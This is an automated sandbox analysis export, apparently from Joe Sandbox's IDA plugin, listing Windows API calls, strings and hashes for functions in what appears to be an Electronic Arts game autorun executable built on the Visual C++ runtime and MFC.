                                                                                                                                              • Instruction Fuzzy Hash: 4951C230D00206AFCF10EFA4C8859EEBBB5EF49314F15966EF812E7291D7388944CB99
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000), ref: 0040C539
                                                                                                                                              • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,?,00000000,00000000), ref: 0040C595
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CurrentDirectoryHandleModule
                                                                                                                                              • String ID: %s\AutoRun$%s\DirectX$%s\Support$1.0$EA Game$Electronic Arts
                                                                                                                                              • API String ID: 1119135582-703046973
                                                                                                                                              • Opcode ID: 5b90b398e6f57ffb548b6c37434c464d42cee5ee5af4ff8ab7da3a7af927fe98
                                                                                                                                              • Instruction ID: 2134d4b6efddb0738bd5c58a3c99903547b8c6aa91fdd798fafc08fe3100bd3d
                                                                                                                                              • Opcode Fuzzy Hash: 5b90b398e6f57ffb548b6c37434c464d42cee5ee5af4ff8ab7da3a7af927fe98
                                                                                                                                              • Instruction Fuzzy Hash: 0A71C675209B40DFC325DF39D8949D7BBE9AF9A304B04486EE4AE83341DB347609CB69
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNEL32(00000064,?,?,?,00000000,00000001), ref: 0040A2E1
                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 0040A2EF
                                                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040A2FB
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040A30A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileFind$CloseDeleteNextSleep
                                                                                                                                              • String ID: %s\%s$Exit runGameSpecificExe$exec: %s with commandline '%s'$runGameSpecificExe
                                                                                                                                              • API String ID: 46525011-3194912456
                                                                                                                                              • Opcode ID: 91241e56bf934b546b699c49240fd400c8f83d3a6524b28ef0f915d6fe014c4e
                                                                                                                                              • Instruction ID: 7511dff2b348f996f6420e377bb50597cd3438be433f07267ca9a05eeeba9e8e
                                                                                                                                              • Opcode Fuzzy Hash: 91241e56bf934b546b699c49240fd400c8f83d3a6524b28ef0f915d6fe014c4e
                                                                                                                                              • Instruction Fuzzy Hash: 6831D97114C3809BE724DF64CC55FDB73A8EFC4704F44492EB98953281DB79A609CB6A
                                                                                                                                              APIs
                                                                                                                                              • GetStockObject.GDI32(00000011), ref: 0043BF6C
                                                                                                                                              • GetStockObject.GDI32(0000000D), ref: 0043BF74
                                                                                                                                              • GetObjectA.GDI32(00000000,0000003C,?), ref: 0043BF81
                                                                                                                                              • GetDC.USER32(00000000), ref: 0043BF90
                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0043BFA4
                                                                                                                                              • MulDiv.KERNEL32(00000000,00000048,00000000), ref: 0043BFB0
                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0043BFBB
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Object$Stock$CapsDeviceRelease
                                                                                                                                              • String ID: System
                                                                                                                                              • API String ID: 46613423-3470857405
                                                                                                                                              • Opcode ID: 34a5214d701ba711fae31cd4acf1fda7a807ca5a63d6224fd731787f2f7bba35
                                                                                                                                              • Instruction ID: 481e154c11c6ec21bb8af5e6b4aac1b2a550fc1cfe250600bab0cbb86326bdff
                                                                                                                                              • Opcode Fuzzy Hash: 34a5214d701ba711fae31cd4acf1fda7a807ca5a63d6224fd731787f2f7bba35
                                                                                                                                              • Instruction Fuzzy Hash: A0118271A00218EBEB10ABA0DC45B9E7B78FF4A745F11502AF705A7180D7759D41CBA9
                                                                                                                                              APIs
                                                                                                                                              • __allrem.LIBCMT ref: 00429332
                                                                                                                                              • __allrem.LIBCMT ref: 0042934A
                                                                                                                                              • __allrem.LIBCMT ref: 00429366
                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004293A1
                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004293BD
                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004293D4
                                                                                                                                                • Part of subcall function 0042DE49: __lock.LIBCMT ref: 0042DE61
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@$__lock
                                                                                                                                              • String ID: E
                                                                                                                                              • API String ID: 4106114094-3568589458
                                                                                                                                              • Opcode ID: 6e3fe257e22c206209be54e6460b1a012ee50f874f1aa7e20f641ca81388939d
                                                                                                                                              • Instruction ID: 1f7421b91edd23947d41c505488e0d727590d15bd34b202d747290f0fbd76ec4
                                                                                                                                              • Opcode Fuzzy Hash: 6e3fe257e22c206209be54e6460b1a012ee50f874f1aa7e20f641ca81388939d
                                                                                                                                              • Instruction Fuzzy Hash: AF716F71F00229AFDF14EFA9DC81BAEB7B5BB48314F54816AE514E3281D378AE418B54
                                                                                                                                              APIs
                                                                                                                                              • GetLastError.KERNEL32(00000400,?,00000000,00000000,80000002,?), ref: 00410FA8
                                                                                                                                              • FormatMessageA.KERNEL32(00001300,00000000,00000000), ref: 00410FB6
                                                                                                                                              • LocalFree.KERNEL32(?,00000000,?,setCacheSize,00000000), ref: 00410FD4
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                                              • String ID: %I64d$CacheSize$SOFTWARE\$setCacheSize
                                                                                                                                              • API String ID: 1365068426-3604744950
                                                                                                                                              • Opcode ID: 6f1e5c5ee282dcb0d7b05a2273a88bf7176ecc9ecce939ed33e8854e711dea49
                                                                                                                                              • Instruction ID: 601950fcef0dd2d4f76d757b2b0c535ca4c20b87e929a9b96b2bb7084ee85d76
                                                                                                                                              • Opcode Fuzzy Hash: 6f1e5c5ee282dcb0d7b05a2273a88bf7176ecc9ecce939ed33e8854e711dea49
                                                                                                                                              • Instruction Fuzzy Hash: DF4127712083429BD324DF28C811BBBB7E5FBC9704F104A1EF99597280DBB5A846C79A
                                                                                                                                              APIs
                                                                                                                                              • GetFileVersionInfoSizeA.VERSION(?,?,?,?,75934B00), ref: 00417983
                                                                                                                                              • GetFileVersionInfoA.VERSION(?,?,00000000,00000000,?,75934B00), ref: 004179C5
                                                                                                                                              • VerQueryValueA.VERSION(00000000,\VarFileInfo\Translation,0047E5B0,?,?,?,00000000,00000000,?,75934B00), ref: 004179E2
                                                                                                                                              • wsprintfA.USER32 ref: 00417A16
                                                                                                                                              • VerQueryValueA.VERSION(00000000,00000000,?,?,?,?,00000000,00000000,?,75934B00), ref: 00417A27
                                                                                                                                              Strings
                                                                                                                                              • \StringFileInfo\%04x%04x\FileVersion, xrefs: 00417A10
                                                                                                                                              • \VarFileInfo\Translation, xrefs: 004179DC
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileInfoQueryValueVersion$Sizewsprintf
                                                                                                                                              • String ID: \StringFileInfo\%04x%04x\FileVersion$\VarFileInfo\Translation
                                                                                                                                              • API String ID: 2824581984-2452293203
                                                                                                                                              • Opcode ID: 1d9a52a8851d63ee804a5414a862a7779f5d1fc8b53472c1e3fbd0a87d9fc535
                                                                                                                                              • Instruction ID: 9c2dee7650dbba52f5ac2e6fe99141784f30488717657b5f3132d8fa3abcba4e
                                                                                                                                              • Opcode Fuzzy Hash: 1d9a52a8851d63ee804a5414a862a7779f5d1fc8b53472c1e3fbd0a87d9fc535
                                                                                                                                              • Instruction Fuzzy Hash: 5F41E3315482419FD321DA69D841EEFB7E89FD9344F04491EF88587201EA3CDA4A8BA6
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00414930: LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 004149A7
                                                                                                                                                • Part of subcall function 00414930: GetProcAddress.KERNEL32(00000000,CopyFileExA), ref: 004149BC
                                                                                                                                                • Part of subcall function 00426C93: SetCurrentDirectoryA.KERNEL32(?,0044CC10,00000128,0040A5D1), ref: 00426CC2
                                                                                                                                                • Part of subcall function 00426C93: GetCurrentDirectoryA.KERNEL32(00000105,?), ref: 00426CD8
                                                                                                                                                • Part of subcall function 00426C93: GetCurrentDirectoryA.KERNEL32(00000001), ref: 00426D49
                                                                                                                                                • Part of subcall function 00426C93: SetEnvironmentVariableA.KERNEL32(0000003D,?), ref: 00426D90
                                                                                                                                                • Part of subcall function 00426C93: GetLastError.KERNEL32 ref: 00426DA0
                                                                                                                                              • SystemParametersInfoA.USER32(00002000,00000000,?,00000000), ref: 0040A684
                                                                                                                                              • SystemParametersInfoA.USER32(00002001,00000000,00000000,00000003), ref: 0040A691
                                                                                                                                              • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,0000000A), ref: 0040A6A5
                                                                                                                                              • SystemParametersInfoA.USER32(00002000,00000000,?,00000003), ref: 0040A6BF
                                                                                                                                              • Sleep.KERNEL32(000003E8,?,?,00000000,?,00000001,?,?,?), ref: 0040A6D5
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CurrentDirectoryInfoParametersSystem$AddressEnvironmentErrorExecuteLastLibraryLoadProcShellSleepVariable
                                                                                                                                              • String ID: %s\%s$open
                                                                                                                                              • API String ID: 2525041801-538903891
                                                                                                                                              • Opcode ID: 59a279b0954385b8510ba35d4019d76de19dcc7699603cd651c81ecb9936c81d
                                                                                                                                              • Instruction ID: 2af7baaca54277b22fbb167bc7bcba665f60fb619d4bc69c6d1dc5b5fddf270f
                                                                                                                                              • Opcode Fuzzy Hash: 59a279b0954385b8510ba35d4019d76de19dcc7699603cd651c81ecb9936c81d
                                                                                                                                              • Instruction Fuzzy Hash: 5741C672184340ABE220DF54EC42FEBB7A8EB98B10F04092EB695571C1DB75A518C7AB
                                                                                                                                              APIs
                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 0042CE0F
                                                                                                                                              • GetStdHandle.KERNEL32(000000F4,0044D548,00000000,?,00000000,00000000,00000000,00000000), ref: 0042CEDC
                                                                                                                                              • WriteFile.KERNEL32(00000000), ref: 0042CEE3
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$HandleModuleNameWrite
                                                                                                                                              • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                                                              • API String ID: 3784150691-4022980321
                                                                                                                                              • Opcode ID: 0650768163dc9c4f50a05eeedea7922e1b2777f21abb24aa52f7481acea4e2f8
                                                                                                                                              • Instruction ID: c978e48409516c837b9f7d6b109fcdf73a8d35c650ed7adbf1cf9c7f4bbfdedb
                                                                                                                                              • Opcode Fuzzy Hash: 0650768163dc9c4f50a05eeedea7922e1b2777f21abb24aa52f7481acea4e2f8
                                                                                                                                              • Instruction Fuzzy Hash: 84311532700224ABDB20AB75BCC2EAF3769EB45314FA1082FF515E3193DE3C9955866C
                                                                                                                                              APIs
                                                                                                                                              • GetModuleFileNameA.KERNEL32(?,?,00000104,?,?), ref: 004439DF
                                                                                                                                              • PathFindExtensionA.SHLWAPI(?), ref: 004439F9
                                                                                                                                              • lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 00443A93
                                                                                                                                              • lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 00443AC0
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExtensionFileFindModuleNamePathlstrcatlstrcpy
                                                                                                                                              • String ID: .CHM$.HLP$.INI
                                                                                                                                              • API String ID: 2140653559-4017452060
                                                                                                                                              • Opcode ID: ced7ff398e87d1135350ecddd8461c4ca43fbd78145f9f545ec3a784a9eb423a
                                                                                                                                              • Instruction ID: 3da9f7d339a1fb26a9a14cda2295bd93ec93db32f178aaf1e18dcb2e1e69cc93
                                                                                                                                              • Opcode Fuzzy Hash: ced7ff398e87d1135350ecddd8461c4ca43fbd78145f9f545ec3a784a9eb423a
                                                                                                                                              • Instruction Fuzzy Hash: 6E415D719407089FEB70EFA9D884A9A77E8BF08705F10482FF585D7241EB789640CB29
                                                                                                                                              APIs
                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,0044D0A0,00000118,004247AD,00000001,00000000,0044C958,00000008,0042CEFA,00000000,00000000,00000000), ref: 0042B393
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileModuleName
                                                                                                                                              • String ID: ...$<program name unknown>$Buffer overrun detected!$Microsoft Visual C++ Runtime Library$Program: $Unknown security failure detected!
                                                                                                                                              • API String ID: 514040917-1673886896
                                                                                                                                              • Opcode ID: 7b7436470715e0ab242502db6aa4f86c5c1c566535bae1bf5ed96faf37d5266a
                                                                                                                                              • Instruction ID: b314efe4c5fffc74cec8ecc2e7cadf2550e4b4112e7a556f74e2c9ec29160370
                                                                                                                                              • Opcode Fuzzy Hash: 7b7436470715e0ab242502db6aa4f86c5c1c566535bae1bf5ed96faf37d5266a
                                                                                                                                              • Instruction Fuzzy Hash: 2A312331B012246BE701AB61AC82F9F37699F04718FA4406FF510A7293CB3C9A254B9D
                                                                                                                                              APIs
                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?,0044CC10,00000128,0040A5D1), ref: 00426CC2
                                                                                                                                              • GetCurrentDirectoryA.KERNEL32(00000105,?), ref: 00426CD8
                                                                                                                                              • GetCurrentDirectoryA.KERNEL32(00000001), ref: 00426D49
                                                                                                                                              • SetEnvironmentVariableA.KERNEL32(0000003D,?), ref: 00426D90
                                                                                                                                              • GetLastError.KERNEL32 ref: 00426DA0
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CurrentDirectory$EnvironmentErrorLastVariable
                                                                                                                                              • String ID: :$=
                                                                                                                                              • API String ID: 373561786-2134709475
                                                                                                                                              • Opcode ID: d246460a0d1c12df66941f8161f6431982f52375665ff665cc06cfe1cca94e64
                                                                                                                                              • Instruction ID: 7366dd2e4e53350f74b67eef3e98498b2befc9c9fea16cefb053c97ee1566376
                                                                                                                                              • Opcode Fuzzy Hash: d246460a0d1c12df66941f8161f6431982f52375665ff665cc06cfe1cca94e64
                                                                                                                                              • Instruction Fuzzy Hash: C031DB71A042784BCB219F64AC456DEBBB4AF4A314F85019FE49492251CB385E91CF59
                                                                                                                                              APIs
                                                                                                                                              • LCMapStringW.KERNEL32(00000000,00000100,0044D18C,00000001,00000000,00000000,0044EA38,00000024,00426AC8,?,00000100,00000100,00000001,?,00000001,?), ref: 00430937
                                                                                                                                              • GetLastError.KERNEL32 ref: 00430949
                                                                                                                                              • LCMapStringW.KERNEL32(?,00000100,?,?,?,?,0044EA38,00000024,00426AC8,?,00000100,00000100,00000001,?,00000001,?), ref: 0043099B
                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000000,0044EA38,00000024,00426AC8,?,00000100,00000100,00000001,?), ref: 004309F6
                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,?,?,?,?,00000000,00000000), ref: 00430A68
                                                                                                                                              • LCMapStringA.KERNEL32(?,00000100,?,?,00000000,00000000), ref: 00430A84
                                                                                                                                              • LCMapStringA.KERNEL32(?,00000100,?,?,?,00000000), ref: 00430AF0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: String$ByteCharMultiWide$ErrorLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1775797328-0
                                                                                                                                              • Opcode ID: d41239965e63cfd970b332cf328efa988257490f0232b29b65bb4f0480a62afa
                                                                                                                                              • Instruction ID: c75369914bf4c3845868e9c525b061c252f4a32f5de875d7f1cb08cbfcae34e4
                                                                                                                                              • Opcode Fuzzy Hash: d41239965e63cfd970b332cf328efa988257490f0232b29b65bb4f0480a62afa
                                                                                                                                              • Instruction Fuzzy Hash: 42717CB180020AAFDF119FA1DC919AFBB75FF09358F14522AFA14A22A0C3398951DF59
                                                                                                                                              APIs
                                                                                                                                              • GetEnvironmentStringsW.KERNEL32(75920A60,00000000,?,?,?,?,00425792), ref: 0042D3F0
                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,00425792), ref: 0042D404
                                                                                                                                              • GetEnvironmentStringsW.KERNEL32(75920A60,00000000,?,?,?,?,00425792), ref: 0042D426
                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,75920A60,00000000,?,?,?,?,00425792), ref: 0042D45A
                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,00425792), ref: 0042D47C
                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,00425792), ref: 0042D495
                                                                                                                                              • GetEnvironmentStrings.KERNEL32(75920A60,00000000,?,?,?,?,00425792), ref: 0042D4AB
                                                                                                                                              • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0042D4E7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: EnvironmentStrings$ByteCharFreeMultiWide$ErrorLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 883850110-0
                                                                                                                                              • Opcode ID: 7c0e9ceb1b89135fe4a9d1fa8d699901a3612c02d2d8f3092bb4031cb0782976
                                                                                                                                              • Instruction ID: 472f25f2f3a0fa31c34653a7449e3421f98c337e42acfa1e6a6286993b93246e
                                                                                                                                              • Opcode Fuzzy Hash: 7c0e9ceb1b89135fe4a9d1fa8d699901a3612c02d2d8f3092bb4031cb0782976
                                                                                                                                              • Instruction Fuzzy Hash: 7731F2B2F042746FD7207F75BC8493BB6ACEA463587A60A3FF545C3201D639AC41866E
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ___shr_12
                                                                                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN$?
                                                                                                                                              • API String ID: 2664560246-4131533671
                                                                                                                                              • Opcode ID: 8025318d78a5ff0f6e88d8d06ec2f51d5bfd69a907a0b40d4c703f9138ae3771
                                                                                                                                              • Instruction ID: 0f9e25a5ffa5b16699b39da3e8b3db3c94cd76f7283178b2ef22f30a253709ab
                                                                                                                                              • Opcode Fuzzy Hash: 8025318d78a5ff0f6e88d8d06ec2f51d5bfd69a907a0b40d4c703f9138ae3771
                                                                                                                                              • Instruction Fuzzy Hash: A7816B32D0429A8EDF11CF64C8847EF7BB4AF69314F04659BD850DB282D37CA645C7A9
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0042AF1E: GetLastError.KERNEL32(?,00000000,00427906,004297FA,00000000,0044CDF0,00000008,00429851,?,?,?,00423F79,00000004,0044C938,0000000C,00423FDD), ref: 0042AF20
                                                                                                                                                • Part of subcall function 0042AF1E: GetCurrentThreadId.KERNEL32 ref: 0042AF6D
                                                                                                                                                • Part of subcall function 0042AF1E: SetLastError.KERNEL32(00000000,?,00423F79,00000004,0044C938,0000000C,00423FDD,000000E0,00424008,?,004369E6,?,?,?,00443BF8,0000000C), ref: 0042AF84
                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00431948
                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00431A45
                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00431A9E
                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00431ABB
                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00431ADE
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$ErrorLast$CurrentThread
                                                                                                                                              • String ID: mE
                                                                                                                                              • API String ID: 1370660682-852767849
                                                                                                                                              • Opcode ID: 81a580f5548f44e620a14ececa36babffeaa0d36948ae564853dc6f46e4ae9dd
                                                                                                                                              • Instruction ID: c8d6d545ca8254b81aa9c793cbca4ed0fd90ebe6b659f5e3f0dc62acac4ae604
                                                                                                                                              • Opcode Fuzzy Hash: 81a580f5548f44e620a14ececa36babffeaa0d36948ae564853dc6f46e4ae9dd
                                                                                                                                              • Instruction Fuzzy Hash: 0B61C4B6B00315AFDB14AF99CC41BAEB2B6EF88314F64452FF50097291D7B99D008B58
                                                                                                                                              APIs
                                                                                                                                              • GetLogicalDrives.KERNEL32 ref: 00411E74
                                                                                                                                              • GetDriveTypeA.KERNEL32(?), ref: 00411EA7
                                                                                                                                              • MessageBoxA.USER32(00000000,?,00446A11,00000001), ref: 00411F83
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DriveDrivesLogicalMessageType
                                                                                                                                              • String ID: %c:\$\Disk Images\$\Disk Images\Disk%d
                                                                                                                                              • API String ID: 1359937597-868800301
                                                                                                                                              • Opcode ID: 42e1eaf1bff76668b61a5634081314ccc6a254b27d15284cf4f303d86f70a8b2
                                                                                                                                              • Instruction ID: 8afbe327e4d74a6595be96fadd5310b57a40e0fcd72e5554749058cd2a1246b8
                                                                                                                                              • Opcode Fuzzy Hash: 42e1eaf1bff76668b61a5634081314ccc6a254b27d15284cf4f303d86f70a8b2
                                                                                                                                              • Instruction Fuzzy Hash: 7061D2712043409BD330DB94DC81FEBB7E9EBC9310F44091FFA8987241EA79A945CB6A
                                                                                                                                              APIs
                                                                                                                                              • GetCPInfo.KERNEL32(?,?,0044EB50,00000038,0042C533,?,00000000,?,?,00000000,00000000,0044D190,0000001C,0042CD7C,00000001,?), ref: 004325D2
                                                                                                                                              • GetCPInfo.KERNEL32(?,00000001,?,?,0042C39D,?,?,00000008,?,?,00424C62,?,?,?,?,00402BBF), ref: 004325E5
                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000,?,?,0042C39D,?,?,00000008,?,?,00424C62,?), ref: 0043262A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Info$ByteCharMultiWide
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1166650589-0
                                                                                                                                              • Opcode ID: be422299c7746ac2b38f3bb3e6242e5a1681e52eba28ec17eee5157774e3f445
                                                                                                                                              • Instruction ID: ea13df6ffc39fcabe32b01fc689c9ae28562827eed5415b20872082be15f5b55
                                                                                                                                              • Opcode Fuzzy Hash: be422299c7746ac2b38f3bb3e6242e5a1681e52eba28ec17eee5157774e3f445
                                                                                                                                              • Instruction Fuzzy Hash: E6519C70901218FBCF218F65ED858AFBBB8FF89750F20512AF814A2250D7755D41CB68
                                                                                                                                              APIs
                                                                                                                                              • GetParent.USER32(?), ref: 00438800
                                                                                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00438827
                                                                                                                                              • UpdateWindow.USER32(?), ref: 00438841
                                                                                                                                              • SendMessageA.USER32(?,00000121,00000000,?), ref: 00438865
                                                                                                                                              • SendMessageA.USER32(?,0000036A,00000000,00000004), ref: 0043887F
                                                                                                                                              • UpdateWindow.USER32(?), ref: 004388C5
                                                                                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 004388F9
                                                                                                                                                • Part of subcall function 00437534: GetWindowLongA.USER32(?,000000F0), ref: 0043753F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2853195852-0
                                                                                                                                              • Opcode ID: b13282f9b8ac6db00a8496b55bdebc49f6485c126065f6b24774a09cd2d7802b
                                                                                                                                              • Instruction ID: 084587f8be8d29286b758f10d7e9662302e5aba9923b57fea7a2f2edceff8d6b
                                                                                                                                              • Opcode Fuzzy Hash: b13282f9b8ac6db00a8496b55bdebc49f6485c126065f6b24774a09cd2d7802b
                                                                                                                                              • Instruction Fuzzy Hash: 3E410330208741AFDB25AF26DC44A2BFAF0FFC9B44F50192EF581911A1CB3AC905CA5A
                                                                                                                                              APIs
                                                                                                                                              • EnterCriticalSection.KERNEL32(?,00000000,?,?,?,?,0044370A,?,00000000,?,?,?,?,00442F66,00441F83,00442F82), ref: 004434A2
